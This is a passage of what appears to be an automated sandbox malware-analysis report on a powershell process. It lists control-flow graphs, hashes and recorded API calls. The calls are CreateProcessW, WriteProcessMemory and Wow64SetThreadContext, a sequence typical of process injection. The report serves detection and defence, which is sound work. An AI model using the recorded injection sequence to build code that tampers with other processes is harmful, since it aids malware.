70c20e0-70c20e2 432->437 438 70c238c-70c238e 434->438 435->438 436->431 437->431 438->413 441 70c2390-70c23ad 438->441 443 70c23af-70c23c1 441->443 444 70c2415-70c241a 441->444 443->413 444->443
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2164199443.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_70c0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                                                                                              • API String ID: 0-3512890053
                                                                                                                                                                                                                              • Opcode ID: c707ef4fc0f38293987980c938f2331ba8619d041506228dcb6dc58ec3e6c0f1
                                                                                                                                                                                                                              • Instruction ID: 12149db4df5de455ac95f936ecb9d7a3511d007ce11a43936af98853f796775f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c707ef4fc0f38293987980c938f2331ba8619d041506228dcb6dc58ec3e6c0f1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3EB138B1B04306DFDB25CB69C81076EBBE6BBC6210F24866FD815CB651DB31C885C7A1

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 634 70c01e8-70c0211 635 70c0459-70c046a 634->635 636 70c0217-70c021c 634->636 648 70c046c-70c0481 635->648 649 70c0482-70c048f 635->649 637 70c021e-70c0224 636->637 638 70c0234-70c0238 636->638 639 70c0228-70c0232 637->639 640 70c0226 637->640 641 70c023e-70c0240 638->641 642 70c0409-70c0413 638->642 639->638 640->638 646 70c0250 641->646 647 70c0242-70c024e 641->647 644 70c0415-70c041e 642->644 645 70c0421-70c0427 642->645 652 70c042d-70c0439 645->652 653 70c0429-70c042b 645->653 654 70c0252-70c0254 646->654 647->654 648->649 650 70c049f 649->650 651 70c0491-70c049d 649->651 656 70c04a1-70c04a3 650->656 651->656 657 70c043b-70c0456 652->657 653->657 654->642 658 70c025a-70c0279 654->658 659 70c04a9-70c04c1 656->659 660 70c0592-70c059c 656->660 676 70c02bb 658->676 677 70c027b-70c028e 658->677 669 70c05e5-70c05ea 659->669 670 70c04c7-70c04cc 659->670 663 70c059e-70c05a4 660->663 664 70c05a7-70c05ad 660->664 667 70c05af-70c05b1 664->667 668 70c05b3-70c05bf 664->668 673 70c05c1-70c05e2 667->673 668->673 674 70c04ce-70c04d4 670->674 675 70c04e4-70c04ee 670->675 681 70c04d8-70c04e2 674->681 682 70c04d6 674->682 686 70c04f3-70c0504 675->686 683 70c02bd-70c02bf 676->683 677->635 690 70c0294-70c0299 677->690 681->675 682->675 683->642 684 70c02c5-70c02cf 683->684 684->635 688 70c02d5-70c02da 684->688 686->669 698 70c050a-70c050f 686->698 692 70c02dc-70c02e2 688->692 693 70c02f2-70c0300 688->693 694 70c029b-70c02a1 690->694 695 70c02b1-70c02b9 690->695 699 70c02e4 692->699 700 70c02e6-70c02f0 692->700 693->642 708 70c0306-70c0323 693->708 696 70c02a5-70c02af 694->696 697 70c02a3 694->697 695->683 696->695 697->695 701 70c0527-70c054a 698->701 702 70c0511-70c0517 698->702 699->693 700->693 701->669 713 70c0550-70c0555 701->713 705 70c0519 702->705 706 70c051b-70c0525 702->706 705->701 706->701 708->642 717 70c0329-70c034e 708->717 715 70c056d-70c058f 713->715 716 70c0557-70c055d 713->716 718 70c055f 716->718 719 70c0561-70c056b 716->719 717->642 725 70c0354-70c038b 717->725 718->715 719->715 729 70c038d-70c0393 725->729 730 70c03a5-70c03ac 725->730 731 70c0395 729->731 732 70c0397-70c03a3 729->732 733 70c03ae-70c03b4 730->733 734 70c03c4-70c0406 730->734 731->730 732->730 736 70c03b8-70c03c2 733->736 737 70c03b6 733->737 736->734 737->734
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2164199443.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_70c0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 4'^q$4'^q$$^q
                                                                                                                                                                                                                              • API String ID: 0-953868773
                                                                                                                                                                                                                              • Opcode ID: 08195896e71997fedafa5fbd55af896ca99fcaeab07c589c8bdd9e41812c4824
                                                                                                                                                                                                                              • Instruction ID: 80ee58b80f285a75b7875373ab68936671dc24e1272af875133880dbe717647d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08195896e71997fedafa5fbd55af896ca99fcaeab07c589c8bdd9e41812c4824
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 38B1D1B0B00216CFDB54CB68CC50A6FBBE6ABC5210B24C66ED515CF355DA72CC46CB91

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 740 70c15b9-70c15fb 742 70c17d6-70c17dc 740->742 743 70c1601-70c1606 740->743 753 70c17de 742->753 754 70c17e1-70c181b 742->754 744 70c161e-70c1622 743->744 745 70c1608-70c160e 743->745 746 70c1628-70c162c 744->746 747 70c1783-70c178d 744->747 749 70c1610 745->749 750 70c1612-70c161c 745->750 751 70c162e-70c163d 746->751 752 70c163f 746->752 755 70c178f-70c1798 747->755 756 70c179b-70c17a1 747->756 749->744 750->744 757 70c1641-70c1643 751->757 752->757 753->754 758 70c1821-70c1826 754->758 759 70c1972-70c1978 754->759 760 70c17a7-70c17b3 756->760 761 70c17a3-70c17a5 756->761 757->747 763 70c1649-70c1669 757->763 764 70c183e-70c1842 758->764 765 70c1828-70c182e 758->765 773 70c197d-70c19be 759->773 774 70c197a 759->774 766 70c17b5-70c17d3 760->766 761->766 798 70c1688 763->798 799 70c166b-70c1686 763->799 771 70c191f-70c1929 764->771 772 70c1848-70c184a 764->772 768 70c1830 765->768 769 70c1832-70c183c 765->769 768->764 769->764 775 70c192b-70c1934 771->775 776 70c1937-70c193d 771->776 779 70c184c-70c1858 772->779 780 70c185a 772->780 782 70c1b2b-70c1b60 773->782 783 70c19c4-70c19c9 773->783 774->773 784 70c193f-70c1941 776->784 785 70c1943-70c194f 776->785 781 70c185c-70c185e 779->781 780->781 781->771 787 70c1864-70c1868 781->787 803 70c1b70 782->803 804 70c1b62-70c1b6e 782->804 788 70c19cb-70c19d1 783->788 789 70c19e1-70c19e5 783->789 790 70c1951-70c196f 784->790 785->790 793 70c1888 787->793 794 70c186a-70c1886 787->794 796 70c19d5-70c19df 788->796 797 70c19d3 788->797 801 70c1ada-70c1ae4 789->801 802 70c19eb-70c19ed 789->802 805 70c188a-70c188c 793->805 794->805 796->789 797->789 808 70c168a-70c168c 798->808 799->808 806 70c1ae6-70c1aef 801->806 807 70c1af2-70c1af8 801->807 810 70c19fd 802->810 811 70c19ef-70c19fb 802->811 814 70c1b72-70c1b74 803->814 804->814 805->771 815 70c1892-70c1895 805->815 816 70c1afe-70c1b0a 807->816 817 70c1afa-70c1afc 807->817 808->747 820 70c1692-70c1694 808->820 812 70c19ff-70c1a01 810->812 811->812 812->801 823 70c1a07-70c1a09 812->823 824 70c1bee-70c1bf8 814->824 825 70c1b76-70c1b78 814->825 836 70c189f-70c18a5 815->836 826 70c1b0c-70c1b28 816->826 817->826 821 70c16a4 820->821 822 70c1696-70c16a2 820->822 828 70c16a6-70c16a8 821->828 822->828 829 70c1a19 823->829 830 70c1a0b-70c1a17 823->830 832 70c1bfa-70c1c00 824->832 833 70c1c03-70c1c09 824->833 834 70c1b88 825->834 835 70c1b7a-70c1b86 825->835 828->747 840 70c16ae-70c16ce 828->840 841 70c1a1b-70c1a1d 829->841 830->841 842 70c1c0f-70c1c1b 833->842 843 70c1c0b-70c1c0d 833->843 844 70c1b8a-70c1b8c 834->844 835->844 848 70c18ab-70c18ad 836->848 874 70c16e6-70c16ea 840->874 875 70c16d0-70c16d6 840->875 841->801 845 70c1a23-70c1a25 841->845 846 70c1c1d-70c1c36 842->846 843->846 844->824 847 70c1b8e-70c1b94 844->847 851 70c1a3f-70c1a43 845->851 852 70c1a27-70c1a2d 845->852 854 70c1b96-70c1b98 847->854 855 70c1ba2-70c1bab 847->855 856 70c18af-70c18b5 848->856 857 70c18c5-70c191c 848->857 864 70c1a5d-70c1ad7 851->864 865 70c1a45-70c1a4b 851->865 862 70c1a2f 852->862 863 70c1a31-70c1a3d 852->863 854->855 859 70c1bad-70c1baf 855->859 860 70c1bb9-70c1bd6 855->860 866 70c18b9-70c18bb 856->866 867 70c18b7 856->867 859->860 878 70c1bd8-70c1be8 860->878 879 70c1c39-70c1c3e 860->879 862->851 863->851 869 70c1a4d 865->869 870 70c1a4f-70c1a5b 865->870 866->857 867->857 869->864 870->864 882 70c16ec-70c16f2 874->882 883 70c1704-70c1708 874->883 880 70c16d8 875->880 881 70c16da-70c16dc 875->881 878->824 879->878 880->874 881->874 885 70c16f4 882->885 886 70c16f6-70c1702 882->886 889 70c170f-70c1711 883->889 885->883 886->883 891 70c1729-70c1780 889->891 892 70c1713-70c1719 889->892 893 70c171d-70c171f 892->893 894 70c171b 892->894 893->891 894->891
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2164199443.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_70c0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 4'^q$$^q$$^q
                                                                                                                                                                                                                              • API String ID: 0-2291298209
                                                                                                                                                                                                                              • Opcode ID: 7618314ec0b303e5a6ff7eff921c83b1886b51b3a0e847147366b02ec1fdf6b1
                                                                                                                                                                                                                              • Instruction ID: 2b2874097d5f1df92e66aebc82e0831d64089f5908111e3698e208f942fe81ab
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7618314ec0b303e5a6ff7eff921c83b1886b51b3a0e847147366b02ec1fdf6b1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D31D2F0A0430D9FDB65DB64880176E7BF5AF42250F58836ED414DB2A3DB35C981CB62

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 896 70c1fa9-70c1fee 898 70c219a-70c21a0 896->898 899 70c1ff4-70c1ff9 896->899 907 70c21a5-70c21bc 898->907 908 70c21a2 898->908 900 70c1ffb-70c2001 899->900 901 70c2011-70c2015 899->901 903 70c2005-70c200f 900->903 904 70c2003 900->904 905 70c201b-70c201d 901->905 906 70c2146-70c2150 901->906 903->901 904->901 909 70c202d 905->909 910 70c201f-70c202b 905->910 911 70c215e-70c2164 906->911 912 70c2152-70c215b 906->912 915 70c21be-70c21e2 907->915 916 70c2217-70c2218 907->916 908->907 913 70c202f-70c2031 909->913 910->913 917 70c216a-70c2176 911->917 918 70c2166-70c2168 911->918 913->906 922 70c2037-70c203b 913->922 923 70c21e8-70c21ed 915->923 924 70c2314-70c231c 915->924 920 70c2229-70c222d 916->920 921 70c2219-70c221f 916->921 919 70c2178-70c2197 917->919 918->919 931 70c222f-70c2235 920->931 932 70c2247-70c2252 920->932 930 70c2223-70c2225 921->930 925 70c203d-70c204c 922->925 926 70c204e 922->926 927 70c21ef-70c21f5 923->927 928 70c2205-70c2209 923->928 946 70c231e 924->946 947 70c2321-70c2330 924->947 933 70c2050-70c2052 925->933 926->933 934 70c21f9-70c2203 927->934 935 70c21f7 927->935 937 70c220f-70c2211 928->937 938 70c22c6-70c22d0 928->938 930->920 930->938 940 70c2239-70c2245 931->940 941 70c2237 931->941 954 70c226a-70c22c3 932->954 955 70c2254-70c225a 932->955 933->906 942 70c2058-70c205a 933->942 934->928 935->928 944 70c2221 937->944 945 70c2213 937->945 948 70c22dd-70c22e3 938->948 949 70c22d2-70c22d4 938->949 940->932 941->932 951 70c205c-70c2068 942->951 952 70c206a 942->952 944->930 945->916 946->947 957 70c22d6-70c22da 947->957 958 70c2332-70c2345 947->958 959 70c22e9-70c22f5 948->959 960 70c22e5-70c22e7 948->960 949->957 962 70c206c-70c206e 951->962 952->962 963 70c225c 955->963 964 70c225e-70c2260 955->964 965 70c2355 958->965 966 70c2347-70c2353 958->966 961 70c22f7-70c2311 959->961 960->961 962->906 970 70c2074-70c2076 962->970 963->954 964->954 968 70c2357-70c2359 965->968 966->968 974 70c235b-70c237a 968->974 975 70c23c7-70c23d1 968->975 972 70c2078-70c207e 970->972 973 70c2090-70c209b 970->973 978 70c2080 972->978 979 70c2082-70c208e 972->979 980 70c209d-70c20a0 973->980 981 70c20aa-70c20b6 973->981 996 70c237c-70c2388 974->996 997 70c238a 974->997 976 70c23da-70c23e0 975->976 977 70c23d3-70c23d7 975->977 983 70c23e6-70c23f2 976->983 984 70c23e2-70c23e4 976->984 978->973 979->973 980->981 986 70c20b8-70c20ba 981->986 987 70c20c4-70c20cb 981->987 988 70c23f4-70c2412 983->988 984->988 986->987 990 70c20d2-70c20d4 987->990 993 70c20ec-70c2143 990->993 994 70c20d6-70c20dc 990->994 998 70c20de 994->998 999 70c20e0-70c20e2 994->999 1000 70c238c-70c238e 996->1000 997->1000 998->993 999->993 1000->975 1003 70c2390-70c23ad 1000->1003 1005 70c23af-70c23c1 1003->1005 1006 70c2415-70c241a 1003->1006 1005->975 1006->1005
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2164199443.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_70c0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 4'^q$$^q$$^q
                                                                                                                                                                                                                              • API String ID: 0-2291298209
                                                                                                                                                                                                                              • Opcode ID: 25aa63fd0be9eb2526de4b1eea094162214c31aade23fe1edd338ad6010915a6
                                                                                                                                                                                                                              • Instruction ID: 89cdf4f5452145f103d139e7dffde63bcda8a18187825c76fe3639fdaca5ebe9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 25aa63fd0be9eb2526de4b1eea094162214c31aade23fe1edd338ad6010915a6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C231DEB090030ADFEB69DF25884466E7BF5BF51210F2986AFDC28CB652C735C885CB61

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1093 2b98950-2b9a689 1095 2b9a68b-2b9a68e 1093->1095 1096 2b9a691-2b9a698 1093->1096 1095->1096 1097 2b9a69a-2b9a6a0 1096->1097 1098 2b9a6a3-2b9a6b9 1096->1098 1097->1098 1099 2b9a6bb-2b9a6c1 1098->1099 1100 2b9a6c4-2b9a767 CreateProcessW 1098->1100 1099->1100 1102 2b9a769-2b9a76f 1100->1102 1103 2b9a770-2b9a7e8 1100->1103 1102->1103 1110 2b9a7fa-2b9a801 1103->1110 1111 2b9a7ea-2b9a7f0 1103->1111 1112 2b9a818 1110->1112 1113 2b9a803-2b9a812 1110->1113 1111->1110 1115 2b9a819 1112->1115 1113->1112 1115->1115
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 02B9A754
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2098765374.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2b90000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateProcess
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 963392458-0
                                                                                                                                                                                                                              • Opcode ID: 815e52436d77e80cafa74d46d289950768682aa445bd48b86a8368a21da5c8f1
                                                                                                                                                                                                                              • Instruction ID: 29fb7fba00e9612e342346459c407e541cb809e5e3327395ea1a4baa16083793
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 815e52436d77e80cafa74d46d289950768682aa445bd48b86a8368a21da5c8f1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D151F571901219DFDF24CF99C980BDDBBB5AF48304F1484EAE909B7250DB75AA85CF90

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1116 2b9a9c0-2b9aa0e 1117 2b9aa18-2b9aa51 WriteProcessMemory 1116->1117 1118 2b9aa10-2b9aa16 1116->1118 1119 2b9aa5a-2b9aa7b 1117->1119 1120 2b9aa53-2b9aa59 1117->1120 1118->1117 1120->1119
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,00000000,00000000,183D2514,00000000,?,?,?,00000000,00000000,?,02B9A1CF,?,00000000,?), ref: 02B9AA44
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2098765374.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2b90000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3559483778-0
                                                                                                                                                                                                                              • Opcode ID: b1028976b93fc9c01273bf9a5e920d182837bf66bc919f2f7ae938a7027f3735
                                                                                                                                                                                                                              • Instruction ID: 5d7de99de7c924f250aad7825bb18f9ecda661f3d1e4fcd27c8e740dac00f55b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1028976b93fc9c01273bf9a5e920d182837bf66bc919f2f7ae938a7027f3735
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E2104B5901319DFDB10CFAAC985BDEBBF4FB08324F10842AE558A7200D378A545CFA4

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1122 2b98974-2b9aa0e 1124 2b9aa18-2b9aa51 WriteProcessMemory 1122->1124 1125 2b9aa10-2b9aa16 1122->1125 1126 2b9aa5a-2b9aa7b 1124->1126 1127 2b9aa53-2b9aa59 1124->1127 1125->1124 1127->1126
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,00000000,00000000,183D2514,00000000,?,?,?,00000000,00000000,?,02B9A1CF,?,00000000,?), ref: 02B9AA44
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2098765374.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2b90000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3559483778-0
                                                                                                                                                                                                                              • Opcode ID: 156176da1bd90b39c97a2f5449262f5565b6520f053daa16181bc4f7a271c9d6
                                                                                                                                                                                                                              • Instruction ID: d66a8403d12a58f5347cf8a0090add7adb3613b55d6d22f1c32f3678a0377b92
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 156176da1bd90b39c97a2f5449262f5565b6520f053daa16181bc4f7a271c9d6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E721E7B5900319DFDB10CF99C984BDEBBF4FB48324F508469E558A7250D378A944CFA5

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1129 2b9a849-2b9a890 1130 2b9a89c-2b9a8c8 Wow64SetThreadContext 1129->1130 1131 2b9a892-2b9a89a 1129->1131 1132 2b9a8ca-2b9a8d0 1130->1132 1133 2b9a8d1-2b9a8f2 1130->1133 1131->1130 1132->1133
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,02B99F83), ref: 02B9A8BB
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2098765374.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2b90000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 983334009-0
                                                                                                                                                                                                                              • Opcode ID: ae6d810a9375034c2f2b5234a1d898ebbb3821609df7fbdc44d0769363dc1696
                                                                                                                                                                                                                              • Instruction ID: 6f2ba8cbe22e2727c6ef46058d289706a4d868e1ee7263b621c4715a928a6ef8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae6d810a9375034c2f2b5234a1d898ebbb3821609df7fbdc44d0769363dc1696
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E91123B2D002098FDB10CFAAC985BDEFBF4EB88320F14C069D458A7640D778A546CFA5

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1142 2b98980-2b9a890 1144 2b9a89c-2b9a8c8 Wow64SetThreadContext 1142->1144 1145 2b9a892-2b9a89a 1142->1145 1146 2b9a8ca-2b9a8d0 1144->1146 1147 2b9a8d1-2b9a8f2 1144->1147 1145->1144 1146->1147
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,02B99F83), ref: 02B9A8BB
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2098765374.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2b90000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 983334009-0
                                                                                                                                                                                                                              • Opcode ID: a49437258e2563f9d333f5f890b8a51871ba82c33a3e5b36c89873cff06410e8
                                                                                                                                                                                                                              • Instruction ID: 05d25162c62df6d6bcffc8e6114859af08aeab59ddaf1934df0fa2da85dd2b05
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a49437258e2563f9d333f5f890b8a51871ba82c33a3e5b36c89873cff06410e8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E1112B2D002098FDB10CFAAC884BDEBBF4EB88324F148069E458A3600D378A545CFA5

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1135 2b9895c-2b9a890 1137 2b9a89c-2b9a8c8 Wow64SetThreadContext 1135->1137 1138 2b9a892-2b9a89a 1135->1138 1139 2b9a8ca-2b9a8d0 1137->1139 1140 2b9a8d1-2b9a8f2 1137->1140 1138->1137 1139->1140
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,02B99F83), ref: 02B9A8BB
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2098765374.0000000002B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_2b90000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 983334009-0
                                                                                                                                                                                                                              • Opcode ID: 7b53bf7db965bab2709ea2bd583b139fa43c4adfb7fe98c35c3e83b666b88492
                                                                                                                                                                                                                              • Instruction ID: 32aa775e424c466b09eaa1cc9d2da9f6b77b2ce0d25455ba8291b0036b2d9354
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b53bf7db965bab2709ea2bd583b139fa43c4adfb7fe98c35c3e83b666b88492
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 811112B2D002098FDB10CFAAC884BDEBBF4EB88324F148069E458A7600D378A545CFA5

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1149 70c0d97-70c0dbf 1150 70c0dec-70c0df4 1149->1150 1151 70c0dc1-70c0dc6 1149->1151 1157 70c0df9-70c0e22 1150->1157 1158 70c0df6 1150->1158 1152 70c0dde-70c0de6 1151->1152 1153 70c0dc8-70c0dce 1151->1153 1159 70c0deb 1152->1159 1155 70c0dd0 1153->1155 1156 70c0dd2-70c0ddc 1153->1156 1155->1152 1156->1152 1162 70c0e28-70c0e39 1157->1162 1163 70c0ee2-70c0f0f 1157->1163 1158->1157 1166 70c0e3b-70c0e41 1162->1166 1167 70c0e53-70c0e70 1162->1167 1168 70c0f3c-70c0f44 1163->1168 1169 70c0f11-70c0f16 1163->1169 1170 70c0e45-70c0e51 1166->1170 1171 70c0e43 1166->1171 1167->1163 1182 70c0e72-70c0e94 1167->1182 1180 70c0f49-70c0f58 1168->1180 1181 70c0f46 1168->1181 1172 70c0f2e-70c0f3b 1169->1172 1173 70c0f18-70c0f1e 1169->1173 1170->1167 1171->1167 1174 70c0f20 1173->1174 1175 70c0f22-70c0f2c 1173->1175 1174->1172 1175->1172 1184 70c0f5c-70c0f72 1180->1184 1185 70c0f5a 1180->1185 1181->1180 1187 70c0eae-70c0ec6 1182->1187 1188 70c0e96-70c0e9c 1182->1188 1192 70c0f7b-70c0f8f 1184->1192 1193 70c0f74 1184->1193 1185->1184 1196 70c0ec8-70c0eca 1187->1196 1197 70c0ed4-70c0edf 1187->1197 1190 70c0e9e 1188->1190 1191 70c0ea0-70c0eac 1188->1191 1190->1187 1191->1187 1193->1192 1196->1197
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2164199443.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_70c0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: tP^q
                                                                                                                                                                                                                              • API String ID: 0-2862610199
                                                                                                                                                                                                                              • Opcode ID: bb08b8b9f6e56e9539b1fcb7426f58544ae4e0e14f7bb85f8e75489a4448dbd4
                                                                                                                                                                                                                              • Instruction ID: 541539a0b4475ab05e98f833073e4de1e1ba08fddf638819e5a9b15d73c5849c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb08b8b9f6e56e9539b1fcb7426f58544ae4e0e14f7bb85f8e75489a4448dbd4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6741F3B0A0938ADFC712CB64CC14A6ABFF1AF46714F19C59AD4489F296C731DC46C7A1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.2164199443.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_70c0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 35a85d711f140b46fada6f9b077688fab39399444e0f00cb53b184820194dd67
                                                                                                                                                                                                                              • Instruction ID: ba6885471ac1ceec3d6652e792486c754d1c839bbc2ec8db92e9b64a42393cee
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 35a85d711f140b46fada6f9b077688fab39399444e0f00cb53b184820194dd67
